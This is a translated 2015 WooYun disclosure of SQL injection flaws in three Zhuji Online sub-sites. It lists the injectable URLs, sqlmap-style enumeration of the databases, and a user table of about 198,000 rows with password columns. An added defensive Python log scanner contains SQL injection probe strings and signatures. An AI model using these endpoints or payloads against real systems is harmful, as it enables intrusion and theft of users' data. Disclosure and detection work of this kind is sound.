
Vulnerability summary

Defect ID: wooyun-2015-0140216

Title: Multiple sub-sites of Zhuji Online (诸暨在线) have SQL injection vulnerabilities (involving 200,000 users' information)

Vendor: Zhuji Online (诸暨在线)

Author: 憋屈

Submitted: 2015-09-10 16:18

Fix time: 2015-10-25 16:20

Disclosed: 2015-10-25 16:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-10: Actively contacting the vendor and waiting for it to acknowledge the report; details not publicly disclosed
2015-10-25: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The formatting is a bit messy; I spent ages adjusting it and it still won't come out right, so I'm submitting it as is. The boss keeps staring at me.

Detailed description:

http://house.zhuji.net/rentlb.asp?community= (Zhuji Real Estate, 诸暨房产网)
http://xywy.zhuji.net/yszs/expert_online.php?type=data&uid=8535076&online=0&toa=1 (Zhuji Medical Search, 诸暨寻医网)
http://hmc.zhuji.net/cnews.aspx?classid= (Zhuji Auto, 诸暨汽车网)
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [13]:
[*] B2C
[*] master
[*] model
[*] msdb
[*] pearl
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tuangou
[*] xd
[*] zhujifriend
[*] zhujionline
[*] zjtogo
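As an added defender-side example that is not part of the original report, the following Python scans IIS W3C-format log lines for injection probes against the three endpoint parameters listed above (the stack is IIS 7.5 with Microsoft SQL Server, so the signatures include MSSQL-specific keywords). The reduced field order, the sample log lines and the signature list are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs
# Endpoints and parameters named in the report, keyed by path as each sub-site logs them.
WATCHED = {
    "/rentlb.asp": {"community"},
    "/yszs/expert_online.php": {"type", "uid", "online", "toa"},
    "/cnews.aspx": {"classid"},
}
# Heuristic signatures: quote breaking, comment truncation, tautologies, MSSQL-specific probes.
SQLI_PATTERNS = [re.compile(p, re.I) for p in (
    r"'", r"--|/\*", r"\b(and|or)\s+\d+\s*=\s*\d+",
    r"\b(union\s+(all\s+)?select|waitfor\s+delay|sysobjects|xp_\w+|@@version)\b")]

# Constructed sample in IIS W3C format with a reduced field list (not real traffic).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2015-09-10 08:18:02 10.0.0.5 GET /rentlb.asp community=1 192.0.2.10 Mozilla/5.0 200
2015-09-10 08:18:05 10.0.0.5 GET /rentlb.asp community=1'+and+1=1-- 192.0.2.10 Mozilla/5.0 200
2015-09-10 08:18:09 10.0.0.5 GET /cnews.aspx classid=3%20waitfor%20delay%20'0:0:5' 192.0.2.10 sqlmap/1.0 500
2015-09-10 08:19:00 10.0.0.5 GET /index.aspx - 198.51.100.7 Mozilla/5.0 200
"""

def parse_w3c_line(line):
    """Map one line onto the field order declared in the #Fields header; skip directives."""
    parts = line.split(" ")
    if line.startswith("#") or len(parts) < 9:
        return None
    return {"stem": parts[4], "query": parts[5], "client": parts[6], "ua": parts[7], "status": parts[8]}

def suspicious_params(stem, query):
    """Return (param, decoded value) pairs on a watched endpoint that match a signature."""
    watched = WATCHED.get(stem.lower())
    if not watched or query == "-":
        return []
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name in watched:
            hits += [(name, v) for v in values if any(p.search(v) for p in SQLI_PATTERNS)]
    return hits

def scan_log(text):
    """Flag requests that probe a watched parameter or carry a scanner User-Agent."""
    findings = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["stem"], rec["query"])
        if hits or "sqlmap" in rec["ua"].lower():
            findings.append({"client": rec["client"], "stem": rec["stem"], "hits": hits, "ua": rec["ua"], "status": rec["status"]})
    return findings
```

The signatures are deliberately narrow to the watched parameters, so a match on these endpoints is a high-confidence signal rather than a general WAF rule; production IIS logs carry more fields, so the parser's index positions must follow the site's actual #Fields header.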

Proof of vulnerability:

Database: zhujionline
[173 tables]
Database: zhujionline, table dbo.TB_User: 197927 entries
Columns: User_ID, User_Modidatetime, vip, mygrade, viptype, User_Sex, User_Type, User_Name, User_Email, User_Accout, User_PenName, User_Birthday, User_Telephone, User_LoginDate, User_Updatetime, User_LoginCount, User_PasswordResult, User_PasswordProblem

Fix recommendation:

Copyright notice: please credit the source when reposting: 憋屈@乌云


Vulnerability response

Vendor response:

Could not contact the vendor, or the vendor actively refused to respond